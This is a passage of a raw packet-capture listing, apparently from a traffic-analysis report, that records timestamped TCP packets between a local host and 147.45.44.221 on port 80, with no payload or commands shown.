                                                                                                                                                    Oct 21, 2024 08:47:30.589987993 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.589991093 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590003967 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590014935 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590017080 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590029955 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590033054 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590044975 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590054035 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590056896 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590065002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590078115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590080976 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590090036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590099096 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590114117 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590150118 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590172052 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590183020 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590190887 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590200901 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590218067 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590224028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590240002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590240955 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590250969 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590261936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590271950 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590271950 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590285063 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590300083 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590310097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590317011 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590321064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590329885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590332031 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590343952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590354919 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590363026 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590382099 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590389013 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590405941 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590416908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590416908 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590428114 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590441942 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590486050 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590521097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590531111 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590549946 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590559006 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590563059 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590569019 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590570927 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590590000 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590596914 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590606928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590611935 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590620041 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590629101 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590647936 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590647936 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590663910 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590668917 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590679884 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590688944 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590698957 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590715885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590728045 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590776920 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590786934 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590791941 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590826988 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590850115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590861082 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590873003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590898991 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590912104 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590914965 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590925932 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590935946 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590960979 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.590972900 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590981960 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.590986013 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591001987 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591008902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591020107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591022015 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591033936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591042042 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591046095 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591054916 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591058016 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591082096 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591088057 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591099977 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591106892 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591139078 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591247082 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591258049 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591267109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591274977 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591284990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591295004 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591304064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591306925 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591315031 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591326952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591336012 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591336966 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591350079 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591350079 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591362000 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.591372013 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.591414928 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.592169046 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.636959076 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.637011051 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.637022018 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.637043953 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.637100935 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.682929039 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.682940960 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.682950020 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.683010101 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.691106081 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691137075 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691155910 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691167116 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691178083 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691184998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.691189051 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691203117 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691204071 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.691215038 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691222906 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.691255093 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.691282988 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691293955 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691304922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691314936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691319942 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.691325903 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691337109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691346884 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.691354036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.691375017 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.691395044 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.706809044 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.706876993 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.706912994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.706923008 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.706928968 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.706933975 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.706939936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.706943989 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.706948042 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.706954956 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.706995964 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707005024 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707012892 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707016945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707021952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707026958 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707040071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707050085 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707056046 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707060099 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707071066 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707082987 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707092047 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707093000 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707113981 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707132101 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707250118 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707268953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707278013 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707295895 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707321882 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707343102 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707354069 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707362890 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707377911 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707393885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707403898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707429886 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707458019 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707468033 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707487106 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707498074 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707504988 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707508087 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707525969 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707544088 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707549095 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707555056 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707580090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707592010 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707616091 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707631111 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707639933 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707657099 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707674980 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707689047 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707696915 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707700968 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707732916 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707825899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707866907 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707899094 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707910061 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707918882 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.707945108 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.707968950 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708210945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708259106 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708309889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708319902 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708337069 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708348036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708357096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708362103 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708389997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708390951 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708401918 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708412886 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708431959 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708434105 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708442926 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708451986 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708461046 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708475113 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708488941 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708511114 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708578110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708589077 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708597898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708606958 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708616018 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708623886 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708648920 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708661079 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708684921 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708729029 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708753109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708762884 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708769083 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708776951 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708806038 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708808899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708823919 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708832979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708843946 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708853006 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708859921 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708865881 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708875895 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708878994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708889008 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708904028 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708921909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.708971024 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708981037 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.708986998 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709017038 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709034920 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709047079 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709057093 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709069014 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709080935 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709098101 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709119081 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709120989 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709134102 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709144115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709165096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709166050 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709176064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709186077 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709187031 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709197044 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709212065 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709212065 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709223986 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709237099 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709249973 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709273100 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709353924 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709363937 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709382057 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709391117 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.709398985 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.709403038 CEST8049732147.45.44.221192.168.2.4
